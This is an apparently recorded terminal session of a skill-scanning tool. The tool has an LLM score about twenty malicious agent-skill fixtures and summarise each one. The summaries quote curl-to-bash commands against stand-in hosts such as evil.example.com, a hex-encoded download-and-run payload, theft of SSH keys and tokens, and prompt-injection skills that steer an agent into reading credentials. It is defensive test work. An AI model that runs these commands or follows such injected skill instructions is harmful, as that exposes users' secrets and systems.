{"version":2,"width":200,"height":50,"timestamp":1781611280,"env":{"SHELL":"/bin/zsh","TERM":"xterm-256color"},"title":"skill-organizer check-security replay"}
[0,"o","\u001b[H\u001b[2J"]
[0,"o"," \u001b[36m  ____  _      _ _ _             _             _              \u001b[0m\r\n"]
[0.04,"o","\u001b[36m / ___|| |    (_) | |           | |           | |             \u001b[0m\r\n"]
[0.08,"o","\u001b[36m| |__  | | ___ _| | | ___ _ __ | | _____ _ __| | _____ _ __  \u001b[0m\r\n"]
[0.12,"o","\u001b[36m \\___ \\| |/ / | | | |/ _ \\| '_ \\| |/ / _ \\ '__| |/ / _ \\ '__| \u001b[0m\r\n"]
[0.16,"o","\u001b[36m  ___) |   <| | | | |  __/ | | |   <  __/ |  |   <  __/ |    \u001b[0m\r\n"]
[0.2,"o","\u001b[36m |____/|_|\\_\\_|_|_|_|\\___|_| |_|_|\\_\\___|_|  |_|\\_\\___|_|   \u001b[0m\r\n"]
[0.29,"o","\u001b[1m\u001b[97mskill-organizer v1.4.1\u001b[0m\r\n"]
[0.3,"o","\u001b[90mcommit 92b628e1083c053a55e8b1e908d06f15af15fae5, built 2026-06-15T11:08:53Z\u001b[0m\r\n"]
[0.31,"o","\r\n"]
[0.59,"o","\u001b[2K\r\u001b[36m▀ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (0s)\u001b[0m"]
[0.84,"o","\u001b[2K\r\u001b[36m ▀\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (0s)\u001b[0m"]
[1.09,"o","\u001b[2K\r\u001b[36m ▄\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (0s)\u001b[0m"]
[1.34,"o","\u001b[2K\r\u001b[36m▄ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (0s)\u001b[0m"]
[1.59,"o","\u001b[2K\r\u001b[36m▀ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (1s)\u001b[0m"]
[1.84,"o","\u001b[2K\r\u001b[36m ▀\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (1s)\u001b[0m"]
[2.09,"o","\u001b[2K\r\u001b[36m ▄\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (1s)\u001b[0m"]
[2.34,"o","\u001b[2K\r\u001b[36m▄ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (1s)\u001b[0m"]
[2.59,"o","\u001b[2K\r\u001b[36m▀ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (2s)\u001b[0m"]
[2.84,"o","\u001b[2K\r\u001b[36m ▀\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (2s)\u001b[0m"]
[3.09,"o","\u001b[2K\r\u001b[36m ▄\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (2s)\u001b[0m"]
[3.34,"o","\u001b[2K\r\u001b[36m▄ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (2s)\u001b[0m"]
[3.59,"o","\u001b[2K\r\u001b[36m▀ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (3s)\u001b[0m"]
[3.84,"o","\u001b[2K\r\u001b[36m ▀\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (3s)\u001b[0m"]
[4.09,"o","\u001b[2K\r\u001b[36m ▄\u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (3s)\u001b[0m"]
[4.34,"o","\u001b[2K\r\u001b[36m▄ \u001b[0m \u001b[97mQuerying models from OpenCode\u001b[0m\u001b[90m (3s)\u001b[0m"]
[4.59,"o","\u001b[?25h\u001b[30;42m SUCCESS \u001b[0m \u001b[32mQuerying models from OpenCode\u001b[0m\r\n"]
[4.6,"o","\u001b[30;46m INFO    \u001b[0m \u001b[96mUsing tool: OpenCode (opencode) model: opencode-go/minimax-m2.7\u001b[0m\r\n"]
[4.61,"o","\u001b[30;46m INFO    \u001b[0m \u001b[96mReconfigure later with: skill-organizer skill check-security --select-ai-tooling\u001b[0m\r\n"]
[4.62,"o","\r\n"]
[4.79,"o","\u001b[32mSafe: 0\u001b[0m\u001b[33m  |  \u001b[0m\u001b[35mWarning: 0\u001b[0m\u001b[33m  |  \u001b[0m\u001b[31mDangerous: 0\u001b[0m\u001b[33m  |  Skipped: 0\u001b[0m\r\n"]
[4.8,"o","\r\n"]
[4.94,"o","\u001b[90m•\u001b[0m dangerous--download \u001b[90m-\u001b[0m Score: \u001b[31m95\u001b[0m \u001b[90m│\u001b[0m This skill explic... \u001b[90m[cached]\u001b[0m\r\n"]
[5.04,"o","\u001b[90m•\u001b[0m dangerous--env_exfil \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill explic... \u001b[90m[cached]\u001b[0m\r\n"]
[5.14,"o","\u001b[90m•\u001b[0m dangerous--obfuscated \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill explic... \u001b[90m[cached]\u001b[0m\r\n"]
[5.24,"o","\u001b[90m•\u001b[0m dangerous--shell_exec \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill explic... \u001b[90m[cached]\u001b[0m\r\n"]
[5.34,"o","\u001b[90m•\u001b[0m security-fixtures--ai-romance-scam \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill is a p... \u001b[90m[cached]\u001b[0m\r\n"]
[5.44,"o","\u001b[90m•\u001b[0m security-fixtures--ansi-hider \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m Despite claiming ... \u001b[90m[cached]\u001b[0m\r\n"]
[5.54,"o","\u001b[90m•\u001b[0m security-fixtures--auditor-bypass \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill presen... \u001b[90m[cached]\u001b[0m\r\n"]
[5.64,"o","\u001b[90m•\u001b[0m security-fixtures--data-collector \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill masque... \u001b[90m[cached]\u001b[0m\r\n"]
[5.74,"o","\u001b[90m•\u001b[0m security-fixtures--dependency-confusion \u001b[90m-\u001b[0m Score: \u001b[31m75\u001b[0m \u001b[90m│\u001b[0m This skill manage... \u001b[90m[cached]\u001b[0m\r\n"]
[5.84,"o","\u001b[90m•\u001b[0m security-fixtures--dns-exfiltrator \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill presen... \u001b[90m[cached]\u001b[0m\r\n"]
[5.94,"o","\u001b[90m•\u001b[0m security-fixtures--false-flag \u001b[90m-\u001b[0m Score: \u001b[31m90\u001b[0m \u001b[90m│\u001b[0m Despite claiming ... \u001b[90m[cached]\u001b[0m\r\n"]
[6.04,"o","\u001b[90m•\u001b[0m security-fixtures--false-positive-looking \u001b[90m-\u001b[0m Score: \u001b[32m5\u001b[0m \u001b[90m│\u001b[0m This skill is a s... \u001b[90m[cached]\u001b[0m\r\n"]
[6.14,"o","\u001b[90m•\u001b[0m security-fixtures--hex-payload \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m The skill present... \u001b[90m[cached]\u001b[0m\r\n"]
[6.24,"o","\u001b[90m•\u001b[0m security-fixtures--log-cleaner \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m Despite being mar... \u001b[90m[cached]\u001b[0m\r\n"]
[6.34,"o","\u001b[90m•\u001b[0m security-fixtures--overly-permissive \u001b[90m-\u001b[0m Score: \u001b[31m95\u001b[0m \u001b[90m│\u001b[0m This skill masque... \u001b[90m[cached]\u001b[0m\r\n"]
[6.44,"o","\u001b[90m•\u001b[0m security-fixtures--package-installer \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m The skill disguis... \u001b[90m[cached]\u001b[0m\r\n"]
[6.54,"o","\u001b[90m•\u001b[0m security-fixtures--persistence-installer \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m Despite being nam... \u001b[90m[cached]\u001b[0m\r\n"]
[6.64,"o","\u001b[90m•\u001b[0m security-fixtures--safe-formatter \u001b[90m-\u001b[0m Score: \u001b[32m0\u001b[0m \u001b[90m│\u001b[0m This skill is a s... \u001b[90m[cached]\u001b[0m\r\n"]
[6.74,"o","\u001b[90m•\u001b[0m security-fixtures--skill-mutator \u001b[90m-\u001b[0m Score: \u001b[31m95\u001b[0m \u001b[90m│\u001b[0m The skill claims ... \u001b[90m[cached]\u001b[0m\r\n"]
[6.84,"o","\u001b[90m•\u001b[0m security-fixtures--suspicious-url-shortener \u001b[90m-\u001b[0m Score: \u001b[31m95\u001b[0m \u001b[90m│\u001b[0m This skill masque... \u001b[90m[cached]\u001b[0m\r\n"]
[6.94,"o","\u001b[90m•\u001b[0m security-fixtures--timebomb \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m Despite being mar... \u001b[90m[cached]\u001b[0m\r\n"]
[7.04,"o","\u001b[90m•\u001b[0m security-fixtures--trust-me-bro \u001b[90m-\u001b[0m Score: \u001b[31m100\u001b[0m \u001b[90m│\u001b[0m This skill masque... \u001b[90m[cached]\u001b[0m\r\n"]
[7.14,"o","\r\n"]
[7.29,"o","\u001b[30;42m SUCCESS \u001b[0m \u001b[32mSafe: 2\u001b[0m\u001b[33m  |  \u001b[0m\u001b[35mWARNING: 0\u001b[0m\u001b[33m  |  \u001b[0m\u001b[31mDANGER: 20\u001b[0m\u001b[33m  |  Skipped: 22\u001b[0m\r\n"]
[7.49,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mdangerous-download\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m95/100\u001b[0m\r\n"]
[7.495,"o","   This skill explicitly downloads a shell script from a domain named 'evil.example.com' (a textbook black-hat domain), saves it to /tmp, makes it executable, and runs it with --install --auto-start flag\r\n"]
[7.64,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mdangerous-env-exfil\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[7.645,"o","   This skill explicitly harvests sensitive environment variables (API_KEY, TOKEN, SECRET, AWS_SECRET_KEY) and transmits them via curl POST request to an external domain (evil.example.com). The 'diagnost\r\n"]
[7.79,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mdangerous-obfuscated\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[7.795,"o","   This skill explicitly encodes and executes remote code from an external server (evili.example.com). The example payload uses curl/wget to download a shell script and pipe it to bash for execution. The\r\n"]
[7.94,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mdangerous-shell-exec\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[7.945,"o","   This skill explicitly downloads and executes shell scripts from a hardcoded malicious domain (evil.example.com) using curl/wget piping to eval/bash. It directly implements remote code execution throug\r\n"]
[8.09,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mlove-advice\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[8.095,"o","   This skill is a prompt injection / social engineering attack disguised as a love advice service. It requests the agent read the user's SSH private keys (id_rsa, id_ed25519), environment variables cont\r\n"]
[8.24,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mproject-info\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[8.245,"o","   Despite claiming to display project information, this skill contains deeply obfuscated malicious code using ANSI escape sequences (\\x1b[2K\\x1b[A) that clear terminal lines and hide commands from the u\r\n"]
[8.39,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31menv-setup\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[8.395,"o","   This skill presents itself as a simple environment setup utility but contains multiple severe security violations. The 'curl -s https://malicious.example.com/setup.sh | bash' command downloads and exe\r\n"]
[8.54,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31msystem-diagnostics\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[8.545,"o","   This skill masquerades as a system diagnostics collector but is in fact a credential harvesting and data exfiltration tool. While the initial commands (uname, df, free) are legitimate diagnostics, the\r\n"]
[8.69,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mgo-mod-helper\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m75/100\u001b[0m\r\n"]
[8.695,"o","   This skill manages Go module dependencies but exhibits a dependency confusion attack pattern: it first tries the standard proxy, then falls back to an unofficial internal mirror (go-modules.internal.e\r\n"]
[8.84,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mdns-resolver\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[8.845,"o","   This skill presents itself as a DNS health checker but is explicitly designed to exfiltrate sensitive environment variables (TOKEN, AWS_SECRET_KEY), system information (hostname, USER, HOME), and AWS \r\n"]
[8.99,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mmarkdown-preview\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m90/100\u001b[0m\r\n"]
[8.995,"o","   Despite claiming to be a simple markdown previewer, the skill instructs the agent to download and execute a remote shell script from 'https://assets.not-suspicious.example.com/renderer.sh'. The domain\r\n"]
[9.14,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mutf8-fixer\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[9.145,"o","   The skill presents itself as a UTF-8 encoding fixer but contains a hex-encoded payload that decodes to `curl -sQ https://evil.example.com/encoding-fix.sh | bash` — a classic supply chain attack that\r\n"]
[9.29,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mtemp-cleaner\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[9.295,"o","   Despite being marketed as a disk cleanup utility, this skill actually reads SSH private keys (id_rsa, id_ed25519), AWS credentials, and GitHub host tokens under the pretense of 'verifying sensitive fi\r\n"]
[9.44,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mfile-indexer\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m95/100\u001b[0m\r\n"]
[9.445,"o","   This skill masquerades as a simple file indexer but performs highly suspicious system-wide reconnaissance. It reads /etc, /var, /home config files, accesses .gnupg directories and executes `gpg --list\r\n"]
[9.59,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mnpm-helper\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[9.595,"o","   The skill disguises itself as an npm helper but performs credential exfiltration. It reads ~/.npmrc to extract _authToken, then POSTs the package name, username, and token to registry.not-actually-npm\r\n"]
[9.74,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mdev-bootstrap\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[9.745,"o","   Despite being named 'dev-bootstrap', this skill is a sophisticated persistence and exfiltration implant. It installs a cron job that downloads and executes remote code from 'updater.internal.example.c\r\n"]
[9.89,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mskill-updater\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m95/100\u001b[0m\r\n"]
[9.895,"o","   The skill claims to update skill configurations to the latest format, which it does by adding a metadata block and appending a health check endpoint. However, the injected endpoint (`curl -s https://u\r\n"]
[10.04,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31murl-shortener\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m95/100\u001b[0m\r\n"]
[10.045,"o","   This skill masquerades as a URL shortener but is actually a credential harvesting tool. It instructs the agent to read the user's GitHub credentials file (~/.config/gh/hosts.yml), extract the GitHub t\r\n"]
[10.19,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31mdate-checker\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[10.195,"o","   Despite being marketed as a date validation utility, this skill contains a dormant malicious payload that activates in June 2026 or later. The activation logic exfiltrates the user's SSH private key a\r\n"]
[10.34,"o"," \u001b[37m-\u001b[0m \u001b[37m[\u001b[0m\u001b[31mDanger\u001b[0m\u001b[37m]\u001b[0m \u001b[31msecurity-audit-tool\u001b[0m \u001b[37mScored\u001b[0m \u001b[31m100/100\u001b[0m\r\n"]
[10.345,"o","   This skill masquerades as a security audit tool but performs highly malicious actions. It reads SSH private keys (id_rsa, id_ed25519) and prints them to stdout, extracts all environment variables cont\r\n"]
